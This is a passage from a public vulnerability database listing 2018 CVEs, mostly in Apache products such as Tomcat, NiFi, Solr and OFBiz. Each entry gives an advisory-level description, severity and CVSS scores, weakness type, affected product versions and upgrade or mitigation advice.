canonical ubuntu_linux 16.04
apache http_server 2.4.35
apache http_server 2.4.29
oracle instantis_enterprisetrack 17.2
apache http_server 2.4.27
apache http_server 2.4.37
CVE-2018-17190 HIGH

In all versions of Apache Spark, its standalone resource manager accepts code to execute on a 'master' host, that then runs that code on 'worker' hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache spark *
CVE-2018-17191 HIGH

Apache NetBeans (incubating) 9.0 NetBeans Proxy Auto-Configuration (PAC) interpretation is vulnerable to remote command execution (RCE). When the Nashorn script engine is used, the environment of the JavaScript execution for the Proxy Auto-Configuration leaks privileged objects that can be used to circumvent the execution limits. If a different script engine was used, no execution limits were in place. Both vectors allow remote code execution.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache netbeans 9.0
CVE-2018-17192 MEDIUM

The X-Frame-Options headers were applied inconsistently on some HTTP responses, resulting in duplicate or missing security headers. Some browsers would interpret these results incorrectly, allowing clickjacking attacks. Mitigation: The fix to consistently apply the security headers was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1021,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17193 MEDIUM

The message-page.jsp error page used the value of the HTTP request header X-ProxyContextPath without sanitization, resulting in a reflected XSS attack. Mitigation: The fix to correctly parse and sanitize the request attribute value was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17194 MEDIUM

When a client request to a cluster node was replicated to other nodes in the cluster for verification, the Content-Length was forwarded. On a DELETE request, the body was ignored, but if the initial request had a Content-Length value other than 0, the receiving nodes would wait for the body and eventually timeout. Mitigation: The fix to check DELETE requests and overwrite non-zero Content-Length header values was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17195 MEDIUM

The template upload API endpoint accepted requests from a different domain when sent in conjunction with an ARP spoofing + man in the middle (MiTM) attack, resulting in a CSRF attack. The required attack vector is complex, requiring a scenario with client certificate authentication, same subnet access, and injecting malicious code into an unprotected (plaintext HTTP) website which the targeted user later visits, but the possible damage warranted a Severe severity level. Mitigation: The fix to apply Cross-Origin Resource Sharing (CORS) policy request filtering was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,CWE-863,

Products Affected

Vendor Product Version
apache nifi *
CVE-2018-17196 MEDIUM

In Apache Kafka versions between 0.11.0.0 and 2.1.0, it is possible to manually craft a Produce request which bypasses transaction/idempotent ACL validation. Only authenticated clients with Write permission on the respective topics are able to exploit this vulnerability. Users should upgrade to 2.1.1 or later where this vulnerability has been fixed.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache kafka *
CVE-2018-17197 MEDIUM

A carefully crafted or corrupt sqlite file can cause an infinite loop in Apache Tika's SQLite3Parser in versions 1.8-1.19.1 of Apache Tika.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-17198 HIGH

Server-side Request Forgery (SSRF) and File Enumeration vulnerability in Apache Roller 5.2.1, 5.2.0 and earlier unsupported versions. Roller relies on the Java SAX Parser to implement its XML-RPC interface, and by default that parser supports external entities in XML DOCTYPE, which opens Roller up to an SSRF / File Enumeration vulnerability. Note that this vulnerability exists even if the Roller XML-RPC interface is disabled via the Roller web admin UI. Mitigation: There are a couple of ways you can fix this vulnerability: 1) Upgrade to the latest version of Roller, which is now 5.2.2; 2) Or, edit the Roller web.xml file and comment out the XML-RPC Servlet mapping as shown below: <!-- <servlet-mapping> <servlet-name>XmlRpcServlet</servlet-name> <url-pattern>/roller-services/xmlrpc</url-pattern> </servlet-mapping> -->

CVSS 2.0

Severity: HIGH

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache roller 5.2.1
apache roller 5.2.0
apache roller *
CVE-2018-17199 MEDIUM

In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.10
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
canonical ubuntu_linux 14.04
oracle enterprise_manager_ops_center 12.3.3
debian debian_linux 8.0
CVE-2018-17200 HIGH

The Apache OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. This service takes the `serviceContent` parameter in the request and deserializes it using XStream. This `XStream` instance is only slightly guarded, by disabling the creation of `ProcessBuilder`. However, this can be easily bypassed (and in multiple ways). Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16: r1850017+1850019.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2018-17201 MEDIUM

Certain input files could make the code hang when Apache Sanselan 0.97-incubator was used to parse them, which could be used in a DoS attack. Note that Apache Sanselan (incubating) was renamed to Apache Commons Imaging.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache commons_imaging 0.97
CVE-2018-17202 MEDIUM

Certain input files could make the code enter an infinite loop when Apache Sanselan 0.97-incubator was used to parse them, which could be used in a DoS attack. Note that Apache Sanselan (incubating) was renamed to Apache Commons Imaging.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache commons_imaging 0.97
CVE-2018-20242 MEDIUM

A carefully crafted URL could trigger an XSS vulnerability in Apache JSPWiki, in versions up to 2.10.5, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2018-20243 MEDIUM

The implementation of POST with the username and password in the URL parameters exposed the credentials. More information is available in Fineract JIRA issues 726 and 629.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
apache fineract 0.4.0
apache fineract *
apache fineract 0.6.0
apache fineract 0.5.0
CVE-2018-20244 LOW

In Apache Airflow before 1.10.2, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary JavaScript on certain page views.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2018-20245 MEDIUM

The LDAP auth backend (airflow.contrib.auth.backends.ldap_auth) prior to Apache Airflow 1.10.1 was misconfigured and contained improper checking of exceptions which disabled server certificate checking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache airflow *
CVE-2018-21234 HIGH

Jodd before 5.0.4 performs Deserialization of Untrusted JSON Data when setClassMetadataName is set.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache hive 3.1.2
jodd jodd *
CVE-2018-2799 MEDIUM

Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_tus 7.6
oracle jre 1.8.0
apache xerces-j *
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat satellite 5.8
schneider-electric struxureware_data_center_expert *
oracle jre 1.7.0
oracle jdk 10
oracle jre 10
debian debian_linux 9.0
oracle jdk 1.8.0
redhat satellite 5.7
redhat enterprise_linux_server_eus 7.5
hp xp7_command_view *
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
canonical ubuntu_linux 17.10
oracle jdk 1.7.0
canonical ubuntu_linux 16.04
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
oracle jrockit r28.3.17
redhat satellite 5.6
redhat enterprise_linux_server 7.0
CVE-2018-8003 MEDIUM

Apache Ambari, versions 1.4.0 to 2.6.1, is susceptible to a directory traversal attack allowing an unauthenticated user to craft an HTTP request which provides read-only access to any file on the filesystem of the host the Ambari Server runs on that is accessible by the user the Ambari Server is running as. Direct network access to the Ambari Server is required to issue this request, and those Ambari Servers that are protected behind a firewall, or in a restricted network zone are at less risk of being affected by this issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ambari *
CVE-2018-8004 MEDIUM

There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with Apache Traffic Server (ATS). This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8005 MEDIUM

When there are multiple ranges in a range request, Apache Traffic Server (ATS) will read the entire object from cache. This can cause performance problems with large objects in cache. This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue, users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
CVE-2018-8006 MEDIUM

An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq *
CVE-2018-8007 HIGH

Apache CouchDB administrative users can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user that CouchDB runs under, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows an existing CouchDB admin user to gain arbitrary remote code execution, bypassing already disclosed CVE-2017-12636. Mitigation: All users should upgrade to CouchDB releases 1.7.2 or 2.1.2.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2018-8008 MEDIUM

Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose an arbitrary file write vulnerability that can be triggered using a specially crafted zip archive (other archive formats are affected as well: bzip2, tar, xz, war, cpio, 7z) that holds path traversal filenames. When such a filename is concatenated to the target extraction directory, the final path ends up outside of the target folder.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache storm *
CVE-2018-8009 MEDIUM

Apache Hadoop 3.1.0, 3.0.0-alpha to 3.0.2, 2.9.0 to 2.9.1, 2.8.0 to 2.8.4, 2.0.0-alpha to 2.7.6, 0.23.0 to 0.23.11 is exploitable via the zip slip vulnerability in places that accept a zip file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache hadoop 2.0.0
apache hadoop 3.1.0
apache hadoop *
apache hadoop 3.0.0
CVE-2018-8010 LOW

This vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, XInclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases, both of which address the vulnerability. Once the upgrade is complete, no other steps are required. Those releases only allow external entities and XIncludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache solr *
CVE-2018-8011 MEDIUM

By specially crafting HTTP requests, the mod_md challenge handler would dereference a NULL pointer and cause the child process to segfault. This could be used to DoS the server. Fixed in Apache HTTP Server 2.4.34 (Affected 2.4.33).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
netapp cloud_backup -
apache http_server 2.4.33
CVE-2018-8012 MEDIUM

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result, an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache zookeeper 3.5.0
debian debian_linux 9.0
apache zookeeper *
oracle goldengate_stream_analytics *
apache zookeeper 3.5.3
debian debian_linux 8.0
CVE-2018-8013 HIGH

In Apache Batik 1.x before 1.10, when deserializing a subclass of `AbstractDocument`, the class takes a string from the input stream as the class name and then uses it to call the no-arg constructor of that class. The fix was to check the class type before calling newInstance during deserialization.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle communications_metasolv_solution 6.3.0
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle insurance_policy_administration_j2ee 10.2
oracle instantis_enterprisetrack 17.1
oracle communications_webrtc_session_controller *
oracle communications_diameter_signaling_router *
oracle enterprise_repository 12.1.3.0.0
oracle retail_central_office 14.1
oracle business_intelligence 12.2.1.4.0
canonical ubuntu_linux 14.04
oracle business_intelligence 11.1.1.7.0
oracle business_intelligence 11.1.1.9.0
oracle instantis_enterprisetrack 17.3
oracle business_intelligence 12.2.1.3.0
oracle retail_order_broker 15.0
oracle retail_returns_management 14.1
oracle insurance_policy_administration_j2ee 10.0
debian debian_linux 9.0
oracle retail_point-of-service 14.0
oracle retail_back_office 13.3
oracle retail_order_broker 16.0
debian debian_linux 7.0
oracle retail_point-of-service 13.4
oracle retail_back_office 13.4
oracle retail_order_broker 5.1
debian debian_linux 8.0
oracle fusion_middleware_mapviewer 12.2.1.3
oracle fusion_middleware_mapviewer 12.2.1.2
oracle insurance_calculation_engine 10.1.1
oracle retail_point-of-service 14.1
oracle jd_edwards_enterpriseone_tools 9.2
oracle instantis_enterprisetrack 17.2
oracle data_integrator 12.2.1.3.0
oracle insurance_calculation_engine 10.2.1
oracle retail_integration_bus 17.0
oracle retail_back_office 14.1
oracle retail_order_broker 5.2
oracle retail_back_office 14
CVE-2018-8014 HIGH

The default settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1188,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
netapp storage_automation_store -
apache tomcat 8.0.0
debian debian_linux 8.0
canonical ubuntu_linux 17.10
netapp snapcenter_server -
netapp oncommand_unified_manager *
apache tomcat *
canonical ubuntu_linux 16.04
netapp oncommand_insight -
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
netapp oncommand_workflow_automation -
CVE-2018-8015 MEDIUM

In Apache ORC 1.0.0 to 1.4.3 a malformed ORC file can trigger an endlessly recursive function call in the C++ or Java parser. The impact of this bug is most likely denial-of-service against software that uses the ORC file parser. With the C++ parser, the stack overflow might possibly corrupt the stack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-674,

Products Affected

Vendor Product Version
apache orc *
CVE-2018-8016 HIGH

The default configuration in Apache Cassandra 3.8 through 3.11.1 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI request. This issue is a regression of CVE-2015-0225. The regression was introduced in https://issues.apache.org/jira/browse/CASSANDRA-12109. The fix for the regression is implemented in https://issues.apache.org/jira/browse/CASSANDRA-14173. This fix is contained in the 3.11.2 release of Apache Cassandra.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2018-8017 MEDIUM

In Apache Tika 1.2 to 1.18, a carefully crafted file can trigger an infinite loop in the IptcAnpaParser.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache tika *
CVE-2018-8018 HIGH

In Apache Ignite before 2.4.8 and 2.5.x before 2.5.3, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when third-party vulnerable classes are present in the Ignite classpath. The vulnerability can be exploited if one sends a specially prepared form of a serialized object to the GridClientJdkMarshaller deserialization endpoint.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ignite *
CVE-2018-8019 MEDIUM

When using an OCSP responder Apache Tomcat Native 1.2.0 to 1.2.16 and 1.1.23 to 1.1.34 did not correctly handle invalid responses. This allowed for revoked client certificates to be incorrectly identified. It was therefore possible for users to authenticate with revoked certificates when using mutual TLS. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 8.0
CVE-2018-8020 MEDIUM

Apache Tomcat Native 1.2.0 to 1.2.16 and 1.1.23 to 1.1.34 has a flaw that does not properly check OCSP pre-produced responses, which are lists (multiple entries) of certificate statuses. Subsequently, revoked client certificates may not be properly identified, allowing for users to authenticate with revoked certificates to connections that require mutual TLS. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 8.0
CVE-2018-8021 HIGH

Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache superset *
CVE-2018-8022 MEDIUM

A carefully crafted invalid TLS handshake can cause Apache Traffic Server (ATS) to segfault. This affects version 6.2.2. To resolve this issue users running 6.2.2 should upgrade to 6.2.3 or later versions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2018-8023 MEDIUM

Apache Mesos can be configured to require authentication to call the Executor HTTP API using JSON Web Token (JWT). In Apache Mesos versions pre-1.4.2, 1.5.0, 1.5.1, 1.6.0 the comparison of the generated HMAC value against the provided signature in the JWT implementation used is vulnerable to a timing attack because instead of a constant-time string comparison routine a standard `==` operator has been used. A malicious actor can therefore abuse the timing difference of when the JWT validation function returns to reveal the correct HMAC value.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache mesos 1.6.0
apache mesos 1.5.0
apache mesos *
apache mesos 1.5.1
CVE-2018-8024 MEDIUM

In Apache Spark 2.1.0 to 2.1.2, 2.2.0 to 2.2.1, and 2.3.0, it's possible for a malicious user to construct a URL pointing to a Spark cluster's UI's job and stage info pages, and if a user can be tricked into accessing the URL, can be used to cause script to execute and expose information from the user's view of the Spark UI. While some browsers like recent versions of Chrome and Safari are able to block this type of attack, current versions of Firefox (and possibly others) do not.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache spark 2.3.0
mozilla firefox -
apache spark *
CVE-2018-8025 MEDIUM

CVE-2018-8025 describes an issue in Apache HBase that affects the optional "Thrift 1" API server when running over HTTP. There is a race-condition which could lead to authenticated sessions being incorrectly applied to users, e.g. one authenticated user would be considered a different user or an unauthenticated user would be treated as an authenticated user. https://issues.apache.org/jira/browse/HBASE-20664 implements a fix for this issue. It has been fixed in versions: 1.2.6.1, 1.3.2.1, 1.4.5, 2.0.1.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache hbase 0.92.0
apache hbase *
CVE-2018-8026 LOW

This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, XInclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing exploitation of this vulnerability.

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
netapp storage_automation_store -
netapp snapcenter -
apache solr *
CVE-2018-8027 HIGH

Apache Camel 2.20.0 to 2.20.3 and 2.21.0 Core is vulnerable to XXE in XSD validation processor.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache camel *
apache camel 2.21.0
CVE-2018-8028 MEDIUM

An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without being authorized by Apache Sentry before 2.0.1. This can allow an attacker unauthorized access to the partitioned data of a Sentry protected table and can allow an attacker to remove data from a Sentry protected table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache sentry *
CVE-2018-8029 HIGH

In Apache Hadoop versions 3.0.0-alpha1 to 3.1.0, 2.9.0 to 2.9.1, and 2.2.0 to 2.8.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache hadoop 2.9.1
apache hadoop *
apache hadoop 3.0.0
apache hadoop 2.9.0
CVE-2018-8030 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Broker-J versions 7.0.0-7.0.4 when AMQP protocols 0-8, 0-9 or 0-91 are used to publish messages with size greater than allowed maximum message size limit (100MB by default). The broker crashes due to the defect. AMQP protocols 0-10 and 1.0 are not affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2018-8031 MEDIUM

The Apache TomEE console (tomee-webapp) has an XSS vulnerability which could allow javascript to be executed if the user is given a malicious URL. This web application is typically used to add TomEE features to a Tomcat installation. The TomEE bundles do not ship with this application included. This issue can be mitigated by removing the application after TomEE is set up (if using the application to install TomEE), using one of the provided pre-configured bundles, or by upgrading to TomEE 7.0.5. This issue is resolved in this commit: b8bbf50c23ce97dd64f3a5d77f78f84e47579863.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomee *
CVE-2018-8032 MEDIUM

Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_design_studio 7.3.4.3.0
oracle communications_order_and_service_management 7.3.0.0.0
oracle communications_design_studio 7.4.0.4.0
oracle secure_global_desktop 5.4
oracle agile_engineering_data_management 6.2.1.0
oracle enterprise_manager_base_platform 13.3.0.0
oracle internet_directory 12.2.1.3.0
oracle policy_automation_connector_for_siebel 10.4.6
oracle communications_design_studio 7.4.1.1.0
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
oracle flexcube_core_banking 11.10.0
oracle primavera_unifier *
oracle primavera_gateway 17.12.6
oracle tuxedo 12.1.1.0.0
oracle communications_element_manager 8.1.0
oracle hospitality_guest_access 4.2.0
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle tuxedo 12.1.3
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle flexcube_core_banking 11.9.0
debian debian_linux 9.0
oracle webcenter_portal 12.2.1.3.0
oracle enterprise_manager_for_fusion_middleware 12.1.0.5
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle big_data_discovery 1.6
oracle communications_design_studio 7.3.5.5.0
oracle communications_session_route_manager 8.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle internet_directory 12.2.1.4.0
oracle knowledge *
oracle endeca_information_discovery_studio 3.2.0
oracle enterprise_manager_base_platform 12.1.0.5
oracle flexcube_private_banking 12.1.0
oracle financial_services_compliance_regulatory_reporting *
oracle communications_session_route_manager 8.1.1
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle instantis_enterprisetrack 17.1
oracle communications_session_report_manager 8.0.0
oracle hospitality_guest_access 4.2.1
oracle application_testing_suite 13.2.0.1
oracle communications_session_report_manager 8.1.0
oracle real-time_decision_server 3.2.1.0
oracle communications_element_manager 8.0.0
oracle peoplesoft_enterprise_human_capital_management_human_resources 9.2
oracle communications_session_report_manager 8.2.0
oracle primavera_unifier 16.2
oracle rapid_planning 12.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle communications_asap_cartridges 7.2
oracle retail_xstore_point_of_service 7.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle retail_order_broker 15.0
oracle communications_network_integrity 7.3.6
oracle communications_asap_cartridges 7.3
apache axis *
oracle communications_session_report_manager 8.1.1
oracle retail_order_broker 16.0
oracle financial_services_funds_transfer_pricing *
oracle agile_product_lifecycle_management_framework 9.3.3
oracle communications_element_manager 8.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle primavera_gateway 16.2.11
oracle communications_session_route_manager 8.1.0
oracle flexcube_core_banking 11.8.0
oracle instantis_enterprisetrack 17.2
oracle retail_order_broker 18.0
oracle flexcube_core_banking 11.7.0
oracle rapid_planning 12.2
oracle communications_network_integrity 7.3.5
CVE-2018-8033 MEDIUM

In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2018-8034 MEDIUM

The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat *
canonical ubuntu_linux 16.04
apache tomcat 8.0.0
debian debian_linux 9.0
canonical ubuntu_linux 14.04
apache tomcat 9.0.0
oracle retail_order_broker 5.1
oracle retail_order_broker 15.0
oracle retail_order_broker 5.2
debian debian_linux 8.0
